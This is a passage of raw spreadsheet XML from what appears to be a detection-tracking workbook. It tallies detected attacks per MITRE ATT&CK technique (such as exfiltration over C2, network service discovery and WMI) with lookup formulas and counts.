      <c r="BO12" s="292">
        <v>8</v>
      </c>
      <c r="BP12" s="322">
        <v>8</v>
      </c>
      <c r="BQ12" s="322" t="str">
        <f t="shared" si="1"/>
        <v>8 (8)</v>
      </c>
      <c r="BR12" s="12">
        <v>0</v>
      </c>
      <c r="BS12" s="12">
        <v>4</v>
      </c>
      <c r="BT12" s="13">
        <v>1</v>
      </c>
      <c r="BU12" s="394">
        <v>7</v>
      </c>
      <c r="BV12" s="292">
        <v>0</v>
      </c>
      <c r="BW12" s="322">
        <v>0</v>
      </c>
      <c r="BX12" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY12" s="12">
        <v>0</v>
      </c>
      <c r="BZ12" s="13">
        <v>0</v>
      </c>
      <c r="CA12" s="394">
        <v>0</v>
      </c>
      <c r="CB12" s="292">
        <v>0</v>
      </c>
      <c r="CC12" s="322">
        <v>0</v>
      </c>
      <c r="CD12" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE12" s="12">
        <v>0</v>
      </c>
      <c r="CF12" s="12">
        <v>0</v>
      </c>
      <c r="CG12" s="13">
        <v>0</v>
      </c>
      <c r="CH12" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:93" ht="15" customHeight="1">
      <c r="A13" s="4">
        <f t="shared" si="3"/>
        <v>11</v>
      </c>
      <c r="B13" s="4" t="str">
        <f>IFERROR(VLOOKUP(A13,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1039</v>
      </c>
      <c r="C13" s="493" t="str">
        <f>IFERROR(VLOOKUP(B13,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data from Network Shared Drive</v>
      </c>
      <c r="D13" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B13)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E13" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B13,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F13" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (3)</v>
      </c>
      <c r="G13" s="292"/>
      <c r="H13" s="322"/>
      <c r="I13" s="322"/>
      <c r="J13" s="12"/>
      <c r="K13" s="13"/>
      <c r="L13" s="394"/>
      <c r="M13" s="322"/>
      <c r="N13" s="322"/>
      <c r="O13" s="322"/>
      <c r="P13" s="12"/>
      <c r="Q13" s="13"/>
      <c r="R13" s="394"/>
      <c r="S13" s="292"/>
      <c r="T13" s="322"/>
      <c r="U13" s="322"/>
      <c r="V13" s="12"/>
      <c r="W13" s="13"/>
      <c r="X13" s="394"/>
      <c r="Y13" s="392"/>
      <c r="Z13" s="392"/>
      <c r="AA13" s="322"/>
      <c r="AB13" s="392"/>
      <c r="AC13" s="16"/>
      <c r="AD13" s="394"/>
      <c r="AE13" s="392"/>
      <c r="AF13" s="392"/>
      <c r="AG13" s="322"/>
      <c r="AH13" s="392"/>
      <c r="AI13" s="16"/>
      <c r="AJ13" s="394"/>
      <c r="AK13" s="392"/>
      <c r="AL13" s="392"/>
      <c r="AM13" s="322"/>
      <c r="AN13" s="392"/>
      <c r="AO13" s="16"/>
      <c r="AP13" s="394"/>
      <c r="AQ13" s="292"/>
      <c r="AR13" s="322"/>
      <c r="AS13" s="322"/>
      <c r="AT13" s="12"/>
      <c r="AU13" s="13"/>
      <c r="AV13" s="394"/>
      <c r="AW13" s="392"/>
      <c r="AX13" s="392"/>
      <c r="AY13" s="322"/>
      <c r="BA13" s="16"/>
      <c r="BB13" s="394"/>
      <c r="BC13" s="292"/>
      <c r="BD13" s="322"/>
      <c r="BE13" s="322"/>
      <c r="BF13" s="12"/>
      <c r="BG13" s="13"/>
      <c r="BH13" s="394"/>
      <c r="BI13" s="292">
        <v>0</v>
      </c>
      <c r="BJ13" s="322">
        <v>0</v>
      </c>
      <c r="BK13" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL13" s="12">
        <v>0</v>
      </c>
      <c r="BM13" s="13">
        <v>0</v>
      </c>
      <c r="BN13" s="394">
        <v>0</v>
      </c>
      <c r="BO13" s="292">
        <v>3</v>
      </c>
      <c r="BP13" s="322">
        <v>3</v>
      </c>
      <c r="BQ13" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="BR13" s="12">
        <v>0</v>
      </c>
      <c r="BS13" s="12">
        <v>3</v>
      </c>
      <c r="BT13" s="13">
        <v>1</v>
      </c>
      <c r="BU13" s="394">
        <v>1</v>
      </c>
      <c r="BV13" s="292">
        <v>0</v>
      </c>
      <c r="BW13" s="322">
        <v>0</v>
      </c>
      <c r="BX13" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY13" s="12">
        <v>0</v>
      </c>
      <c r="BZ13" s="13">
        <v>0</v>
      </c>
      <c r="CA13" s="394">
        <v>0</v>
      </c>
      <c r="CB13" s="292">
        <v>0</v>
      </c>
      <c r="CC13" s="322">
        <v>0</v>
      </c>
      <c r="CD13" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE13" s="12">
        <v>0</v>
      </c>
      <c r="CF13" s="12">
        <v>0</v>
      </c>
      <c r="CG13" s="13">
        <v>0</v>
      </c>
      <c r="CH13" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:93" ht="15" customHeight="1">
      <c r="A14" s="4">
        <f t="shared" si="3"/>
        <v>12</v>
      </c>
      <c r="B14" s="4" t="str">
        <f>IFERROR(VLOOKUP(A14,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1041</v>
      </c>
      <c r="C14" s="493" t="str">
        <f>IFERROR(VLOOKUP(B14,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
      <c r="D14" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B14)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E14" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B14,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F14" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (2)</v>
      </c>
      <c r="G14" s="292"/>
      <c r="H14" s="322"/>
      <c r="I14" s="322"/>
      <c r="J14" s="12"/>
      <c r="K14" s="13"/>
      <c r="L14" s="394"/>
      <c r="M14" s="322"/>
      <c r="N14" s="322"/>
      <c r="O14" s="322"/>
      <c r="P14" s="12"/>
      <c r="Q14" s="13"/>
      <c r="R14" s="394"/>
      <c r="S14" s="292"/>
      <c r="T14" s="322"/>
      <c r="U14" s="322"/>
      <c r="V14" s="12"/>
      <c r="W14" s="13"/>
      <c r="X14" s="394"/>
      <c r="Y14" s="392"/>
      <c r="Z14" s="392"/>
      <c r="AA14" s="322"/>
      <c r="AB14" s="392"/>
      <c r="AC14" s="16"/>
      <c r="AD14" s="394"/>
      <c r="AE14" s="392"/>
      <c r="AF14" s="392"/>
      <c r="AG14" s="322"/>
      <c r="AH14" s="392"/>
      <c r="AI14" s="16"/>
      <c r="AJ14" s="394"/>
      <c r="AK14" s="392"/>
      <c r="AL14" s="392"/>
      <c r="AM14" s="322"/>
      <c r="AN14" s="392"/>
      <c r="AO14" s="16"/>
      <c r="AP14" s="394"/>
      <c r="AQ14" s="292"/>
      <c r="AR14" s="322"/>
      <c r="AS14" s="322"/>
      <c r="AT14" s="12"/>
      <c r="AU14" s="13"/>
      <c r="AV14" s="394"/>
      <c r="AW14" s="392"/>
      <c r="AX14" s="392"/>
      <c r="AY14" s="322"/>
      <c r="BA14" s="16"/>
      <c r="BB14" s="394"/>
      <c r="BC14" s="292"/>
      <c r="BD14" s="322"/>
      <c r="BE14" s="322"/>
      <c r="BF14" s="12"/>
      <c r="BG14" s="13"/>
      <c r="BH14" s="394"/>
      <c r="BI14" s="292">
        <v>0</v>
      </c>
      <c r="BJ14" s="322">
        <v>0</v>
      </c>
      <c r="BK14" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL14" s="12">
        <v>0</v>
      </c>
      <c r="BM14" s="13">
        <v>0</v>
      </c>
      <c r="BN14" s="394">
        <v>0</v>
      </c>
      <c r="BO14" s="292">
        <v>1</v>
      </c>
      <c r="BP14" s="322">
        <v>1</v>
      </c>
      <c r="BQ14" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="BR14" s="12">
        <v>0</v>
      </c>
      <c r="BS14" s="12">
        <v>1</v>
      </c>
      <c r="BT14" s="13">
        <v>1</v>
      </c>
      <c r="BU14" s="394">
        <v>1</v>
      </c>
      <c r="BV14" s="292">
        <v>0</v>
      </c>
      <c r="BW14" s="322">
        <v>0</v>
      </c>
      <c r="BX14" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY14" s="12">
        <v>0</v>
      </c>
      <c r="BZ14" s="13">
        <v>0</v>
      </c>
      <c r="CA14" s="394">
        <v>0</v>
      </c>
      <c r="CB14" s="292">
        <v>0</v>
      </c>
      <c r="CC14" s="322">
        <v>0</v>
      </c>
      <c r="CD14" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE14" s="12">
        <v>0</v>
      </c>
      <c r="CF14" s="12">
        <v>0</v>
      </c>
      <c r="CG14" s="13">
        <v>0</v>
      </c>
      <c r="CH14" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:93" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A15" s="4">
        <f t="shared" si="3"/>
        <v>13</v>
      </c>
      <c r="B15" s="4" t="str">
        <f>IFERROR(VLOOKUP(A15,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1046</v>
      </c>
      <c r="C15" s="493" t="str">
        <f>IFERROR(VLOOKUP(B15,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Network Service Discovery</v>
      </c>
      <c r="D15" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B15)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E15" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B15,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>65846</v>
      </c>
      <c r="F15" s="579" t="str">
        <f t="shared" si="4"/>
        <v>3 (65846)</v>
      </c>
      <c r="G15" s="292"/>
      <c r="H15" s="322"/>
      <c r="I15" s="322"/>
      <c r="J15" s="12"/>
      <c r="K15" s="13"/>
      <c r="L15" s="394"/>
      <c r="M15" s="322"/>
      <c r="N15" s="322"/>
      <c r="O15" s="322"/>
      <c r="P15" s="12"/>
      <c r="Q15" s="13"/>
      <c r="R15" s="394"/>
      <c r="S15" s="292"/>
      <c r="T15" s="322"/>
      <c r="U15" s="322"/>
      <c r="V15" s="12"/>
      <c r="W15" s="13"/>
      <c r="X15" s="394"/>
      <c r="Y15" s="392"/>
      <c r="Z15" s="392"/>
      <c r="AA15" s="322"/>
      <c r="AB15" s="392"/>
      <c r="AC15" s="16"/>
      <c r="AD15" s="394"/>
      <c r="AE15" s="392"/>
      <c r="AF15" s="392"/>
      <c r="AG15" s="322"/>
      <c r="AH15" s="392"/>
      <c r="AI15" s="16"/>
      <c r="AJ15" s="394"/>
      <c r="AK15" s="392"/>
      <c r="AL15" s="392"/>
      <c r="AM15" s="322"/>
      <c r="AN15" s="392"/>
      <c r="AO15" s="16"/>
      <c r="AP15" s="394"/>
      <c r="AQ15" s="292"/>
      <c r="AR15" s="322"/>
      <c r="AS15" s="322"/>
      <c r="AT15" s="12"/>
      <c r="AU15" s="13"/>
      <c r="AV15" s="394"/>
      <c r="AW15" s="392"/>
      <c r="AX15" s="392"/>
      <c r="AY15" s="322"/>
      <c r="AZ15" s="4"/>
      <c r="BA15" s="16"/>
      <c r="BB15" s="394"/>
      <c r="BC15" s="292"/>
      <c r="BD15" s="322"/>
      <c r="BE15" s="322"/>
      <c r="BF15" s="12"/>
      <c r="BG15" s="13"/>
      <c r="BH15" s="394"/>
      <c r="BI15" s="292">
        <v>7</v>
      </c>
      <c r="BJ15" s="322">
        <v>3</v>
      </c>
      <c r="BK15" s="322" t="str">
        <f t="shared" si="0"/>
        <v>3 (7)</v>
      </c>
      <c r="BL15" s="12">
        <v>2</v>
      </c>
      <c r="BM15" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BN15" s="394">
        <v>3</v>
      </c>
      <c r="BO15" s="292">
        <v>19</v>
      </c>
      <c r="BP15" s="322">
        <v>15</v>
      </c>
      <c r="BQ15" s="322" t="str">
        <f t="shared" si="1"/>
        <v>15 (19)</v>
      </c>
      <c r="BR15" s="12">
        <v>2</v>
      </c>
      <c r="BS15" s="12">
        <v>7</v>
      </c>
      <c r="BT15" s="13">
        <v>1</v>
      </c>
      <c r="BU15" s="394">
        <v>15</v>
      </c>
      <c r="BV15" s="292">
        <v>8</v>
      </c>
      <c r="BW15" s="322">
        <v>8</v>
      </c>
      <c r="BX15" s="322" t="str">
        <f t="shared" si="2"/>
        <v>8 (8)</v>
      </c>
      <c r="BY15" s="12">
        <v>6</v>
      </c>
      <c r="BZ15" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="CA15" s="394">
        <v>8</v>
      </c>
      <c r="CB15" s="292">
        <v>8</v>
      </c>
      <c r="CC15" s="322">
        <v>8</v>
      </c>
      <c r="CD15" s="322" t="s">
        <v>4744</v>
      </c>
      <c r="CE15" s="12">
        <v>6</v>
      </c>
      <c r="CF15" s="12">
        <v>1</v>
      </c>
      <c r="CG15" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="CH15" s="394">
        <v>8</v>
      </c>
    </row>
    <row r="16" spans="1:93" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A16" s="4">
        <f t="shared" si="3"/>
        <v>14</v>
      </c>
      <c r="B16" s="4" t="str">
        <f>IFERROR(VLOOKUP(A16,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1047</v>
      </c>
      <c r="C16" s="493" t="str">
        <f>IFERROR(VLOOKUP(B16,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Windows Management Instrumentation</v>
      </c>
      <c r="D16" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B16)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E16" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>912</v>
      </c>
      <c r="F16" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (912)</v>
      </c>
      <c r="G16" s="292"/>
      <c r="H16" s="322"/>
      <c r="I16" s="322"/>
      <c r="J16" s="12"/>
      <c r="K16" s="13"/>
      <c r="L16" s="394"/>
      <c r="M16" s="322"/>
      <c r="N16" s="322"/>
      <c r="O16" s="322"/>
      <c r="P16" s="12"/>
      <c r="Q16" s="13"/>
      <c r="R16" s="394"/>
      <c r="S16" s="292"/>
      <c r="T16" s="322"/>
      <c r="U16" s="322"/>
      <c r="V16" s="12"/>
      <c r="W16" s="13"/>
      <c r="X16" s="394"/>
      <c r="Y16" s="392"/>
      <c r="Z16" s="392"/>
      <c r="AA16" s="322"/>
      <c r="AB16" s="392"/>
      <c r="AC16" s="16"/>
      <c r="AD16" s="394"/>
      <c r="AE16" s="392"/>
      <c r="AF16" s="392"/>
      <c r="AG16" s="322"/>
      <c r="AH16" s="392"/>
      <c r="AI16" s="16"/>
      <c r="AJ16" s="394"/>
      <c r="AK16" s="392"/>
      <c r="AL16" s="392"/>
      <c r="AM16" s="322"/>
      <c r="AN16" s="392"/>
      <c r="AO16" s="16"/>
      <c r="AP16" s="394"/>
      <c r="AQ16" s="292"/>
      <c r="AR16" s="322"/>
      <c r="AS16" s="322"/>
      <c r="AT16" s="12"/>
      <c r="AU16" s="13"/>
      <c r="AV16" s="394"/>
      <c r="AW16" s="392"/>
      <c r="AX16" s="392"/>
      <c r="AY16" s="322"/>
      <c r="AZ16" s="4"/>
      <c r="BA16" s="16"/>
      <c r="BB16" s="394"/>
      <c r="BC16" s="292"/>
      <c r="BD16" s="322"/>
      <c r="BE16" s="322"/>
      <c r="BF16" s="12"/>
      <c r="BG16" s="13"/>
      <c r="BH16" s="394"/>
      <c r="BI16" s="292">
        <v>2</v>
      </c>
      <c r="BJ16" s="322">
        <v>2</v>
      </c>
      <c r="BK16" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (2)</v>
      </c>
      <c r="BL16" s="12">
        <v>1</v>
      </c>
      <c r="BM16" s="13">
        <v>1</v>
      </c>
      <c r="BN16" s="394">
        <v>2</v>
      </c>
      <c r="BO16" s="292">
        <v>917</v>
      </c>
      <c r="BP16" s="322">
        <v>914</v>
      </c>
      <c r="BQ16" s="322" t="str">
        <f t="shared" si="1"/>
        <v>914 (917)</v>
      </c>
      <c r="BR16" s="12">
        <v>1</v>
      </c>
      <c r="BS16" s="12">
        <v>4</v>
      </c>
      <c r="BT16" s="13">
        <v>1</v>
      </c>
      <c r="BU16" s="394">
        <v>912</v>
      </c>
      <c r="BV16" s="292">
        <v>0</v>
      </c>
      <c r="BW16" s="322">
        <v>0</v>
      </c>
      <c r="BX16" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY16" s="12">
        <v>0</v>
      </c>
      <c r="BZ16" s="13">
        <v>0</v>
      </c>
      <c r="CA16" s="394">
        <v>0</v>
      </c>
      <c r="CB16" s="292">
        <v>0</v>
      </c>
      <c r="CC16" s="322">
        <v>0</v>
      </c>
      <c r="CD16" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE16" s="12">
        <v>0</v>
      </c>
      <c r="CF16" s="12">
        <v>0</v>
      </c>
      <c r="CG16" s="13">
        <v>0</v>
      </c>
      <c r="CH16" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A17" s="4">
        <f t="shared" si="3"/>
        <v>15</v>
      </c>
      <c r="B17" s="4" t="str">
        <f>IFERROR(VLOOKUP(A17,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1048</v>
      </c>
      <c r="C17" s="493" t="str">
        <f>IFERROR(VLOOKUP(B17,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Alternative Protocol</v>
      </c>
      <c r="D17" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B17)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E17" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F17" s="579" t="str">
        <f t="shared" si="4"/>
        <v>2 (12)</v>
      </c>
      <c r="G17" s="292"/>
      <c r="H17" s="322"/>
      <c r="I17" s="322"/>
      <c r="J17" s="12"/>
      <c r="K17" s="13"/>
      <c r="L17" s="394"/>
      <c r="M17" s="322"/>
      <c r="N17" s="322"/>
      <c r="O17" s="322"/>
      <c r="P17" s="12"/>
      <c r="Q17" s="13"/>
      <c r="R17" s="394"/>
      <c r="S17" s="292"/>
      <c r="T17" s="322"/>
      <c r="U17" s="322"/>
      <c r="V17" s="12"/>
      <c r="W17" s="13"/>
      <c r="X17" s="394"/>
      <c r="Y17" s="392"/>
      <c r="Z17" s="392"/>
      <c r="AA17" s="322"/>
      <c r="AB17" s="392"/>
      <c r="AC17" s="16"/>
      <c r="AD17" s="394"/>
      <c r="AE17" s="392"/>
      <c r="AF17" s="392"/>
      <c r="AG17" s="322"/>
      <c r="AH17" s="392"/>
      <c r="AI17" s="16"/>
      <c r="AJ17" s="394"/>
      <c r="AK17" s="392"/>
      <c r="AL17" s="392"/>
      <c r="AM17" s="322"/>
      <c r="AN17" s="392"/>
      <c r="AO17" s="16"/>
      <c r="AP17" s="394"/>
      <c r="AQ17" s="292"/>
      <c r="AR17" s="322"/>
      <c r="AS17" s="322"/>
      <c r="AT17" s="12"/>
      <c r="AU17" s="13"/>
      <c r="AV17" s="394"/>
      <c r="AW17" s="392"/>
      <c r="AX17" s="392"/>
      <c r="AY17" s="322"/>
      <c r="AZ17" s="4"/>
      <c r="BA17" s="16"/>
      <c r="BB17" s="394"/>
      <c r="BC17" s="292"/>
      <c r="BD17" s="322"/>
      <c r="BE17" s="322"/>
      <c r="BF17" s="12"/>
      <c r="BG17" s="13"/>
      <c r="BH17" s="394"/>
      <c r="BI17" s="292">
        <v>0</v>
      </c>
      <c r="BJ17" s="322">
        <v>0</v>
      </c>
      <c r="BK17" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL17" s="12">
        <v>0</v>
      </c>
      <c r="BM17" s="13">
        <v>0</v>
      </c>
      <c r="BN17" s="394">
        <v>0</v>
      </c>
      <c r="BO17" s="292">
        <v>9</v>
      </c>
      <c r="BP17" s="322">
        <v>3</v>
      </c>
      <c r="BQ17" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (9)</v>
      </c>
      <c r="BR17" s="12">
        <v>0</v>
      </c>
      <c r="BS17" s="12">
        <v>3</v>
      </c>
      <c r="BT17" s="13">
        <v>1</v>
      </c>
      <c r="BU17" s="394">
        <v>3</v>
      </c>
      <c r="BV17" s="292">
        <v>0</v>
      </c>
      <c r="BW17" s="322">
        <v>0</v>
      </c>
      <c r="BX17" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="BY17" s="12">
        <v>0</v>
      </c>
      <c r="BZ17" s="13">
        <v>0</v>
      </c>
      <c r="CA17" s="394">
        <v>0</v>
      </c>
      <c r="CB17" s="292">
        <v>0</v>
      </c>
      <c r="CC17" s="322">
        <v>0</v>
      </c>
      <c r="CD17" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE17" s="12">
        <v>0</v>
      </c>
      <c r="CF17" s="12">
        <v>0</v>
      </c>
      <c r="CG17" s="13">
        <v>0</v>
      </c>
      <c r="CH17" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A18" s="4">
        <f t="shared" si="3"/>
        <v>16</v>
      </c>
      <c r="B18" s="4" t="str">
        <f>IFERROR(VLOOKUP(A18,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1053</v>
      </c>
      <c r="C18" s="493" t="str">
        <f>IFERROR(VLOOKUP(B18,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Scheduled Task/Job</v>
      </c>
      <c r="D18" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B18)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E18" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F18" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (2)</v>
      </c>
      <c r="G18" s="292"/>
      <c r="H18" s="322"/>
      <c r="I18" s="322"/>
      <c r="J18" s="12"/>
      <c r="K18" s="13"/>
      <c r="L18" s="394"/>
      <c r="M18" s="322"/>
      <c r="N18" s="322"/>
      <c r="O18" s="322"/>
      <c r="P18" s="12"/>
      <c r="Q18" s="13"/>
      <c r="R18" s="394"/>
      <c r="S18" s="292"/>
      <c r="T18" s="322"/>
      <c r="U18" s="322"/>
      <c r="V18" s="12"/>
      <c r="W18" s="13"/>
      <c r="X18" s="394"/>
      <c r="Y18" s="392"/>
      <c r="Z18" s="392"/>
      <c r="AA18" s="322"/>
      <c r="AB18" s="392"/>
      <c r="AC18" s="16"/>
      <c r="AD18" s="394"/>
      <c r="AE18" s="392"/>
      <c r="AF18" s="392"/>
      <c r="AG18" s="322"/>
      <c r="AH18" s="392"/>
      <c r="AI18" s="16"/>
      <c r="AJ18" s="394"/>
      <c r="AK18" s="392"/>
      <c r="AL18" s="392"/>
      <c r="AM18" s="322"/>
      <c r="AN18" s="392"/>
      <c r="AO18" s="16"/>
      <c r="AP18" s="394"/>
      <c r="AQ18" s="292"/>
      <c r="AR18" s="322"/>
      <c r="AS18" s="322"/>
      <c r="AT18" s="12"/>
      <c r="AU18" s="13"/>
      <c r="AV18" s="394"/>
      <c r="AW18" s="392"/>
      <c r="AX18" s="392"/>
      <c r="AY18" s="322"/>
      <c r="AZ18" s="4"/>
      <c r="BA18" s="16"/>
      <c r="BB18" s="394"/>
      <c r="BC18" s="292"/>
      <c r="BD18" s="322"/>
      <c r="BE18" s="322"/>
      <c r="BF18" s="12"/>
      <c r="BG18" s="13"/>
      <c r="BH18" s="394"/>
      <c r="BI18" s="292">
        <v>2</v>
      </c>
      <c r="BJ18" s="322">
        <v>2</v>
      </c>
      <c r="BK18" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (2)</v>
      </c>
      <c r="BL18" s="12">
        <v>1</v>
      </c>
      <c r="BM18" s="13">
        <v>1</v>
      </c>
      <c r="BN18" s="394">
        <v>2</v>
      </c>
      <c r="BO18" s="292">
        <v>2</v>
      </c>
      <c r="BP18" s="322">
        <v>2</v>
      </c>
      <c r="BQ18" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (2)</v>
      </c>
      <c r="BR18" s="12">
        <v>1</v>
      </c>
      <c r="BS18" s="12">
        <v>0</v>
      </c>
      <c r="BT18" s="13">
        <v>1</v>
      </c>
      <c r="BU18" s="394">
        <v>2</v>
      </c>
      <c r="BV18" s="292">
        <v>1</v>
      </c>
      <c r="BW18" s="322">
        <v>1</v>
      </c>
      <c r="BX18" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="BY18" s="12">
        <v>1</v>
      </c>
      <c r="BZ18" s="13">
        <v>1</v>
      </c>
      <c r="CA18" s="394">
        <v>1</v>
      </c>
      <c r="CB18" s="292">
        <v>1</v>
      </c>
      <c r="CC18" s="322">
        <v>1</v>
      </c>
      <c r="CD18" s="322" t="s">
        <v>2496</v>
      </c>
      <c r="CE18" s="12">
        <v>1</v>
      </c>
      <c r="CF18" s="12">
        <v>0</v>
      </c>
      <c r="CG18" s="13">
        <v>1</v>
      </c>
      <c r="CH18" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:86" ht="15" customHeight="1">
      <c r="A19" s="4">
        <f t="shared" si="3"/>
        <v>17</v>
      </c>
      <c r="B19" s="4" t="str">
        <f>IFERROR(VLOOKUP(A19,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1070</v>
      </c>
      <c r="C19" s="493" t="str">
        <f>IFERROR(VLOOKUP(B19,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Indicator Removal</v>
      </c>
      <c r="D19" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B19)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E19" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F19" s="579" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="G19" s="292"/>
      <c r="H19" s="322"/>
      <c r="I19" s="322"/>
      <c r="J19" s="12"/>
      <c r="K19" s="13"/>
      <c r="L19" s="394"/>
      <c r="M19" s="322"/>
      <c r="N19" s="322"/>
      <c r="O19" s="322"/>
      <c r="P19" s="12"/>
      <c r="Q19" s="13"/>
      <c r="R19" s="394"/>
      <c r="S19" s="292"/>
      <c r="T19" s="322"/>
      <c r="U19" s="322"/>
      <c r="V19" s="12"/>
      <c r="W19" s="13"/>
      <c r="X19" s="394"/>
      <c r="Y19" s="392"/>
      <c r="Z19" s="392"/>
      <c r="AA19" s="322"/>
      <c r="AB19" s="392"/>
      <c r="AC19" s="16"/>
      <c r="AD19" s="394"/>
      <c r="AE19" s="392"/>
      <c r="AF19" s="392"/>
      <c r="AG19" s="322"/>
      <c r="AH19" s="392"/>
      <c r="AI19" s="16"/>
      <c r="AJ19" s="394"/>
      <c r="AK19" s="392"/>
      <c r="AL19" s="392"/>
      <c r="AM19" s="322"/>
      <c r="AN19" s="392"/>
      <c r="AO19" s="16"/>
      <c r="AP19" s="394"/>
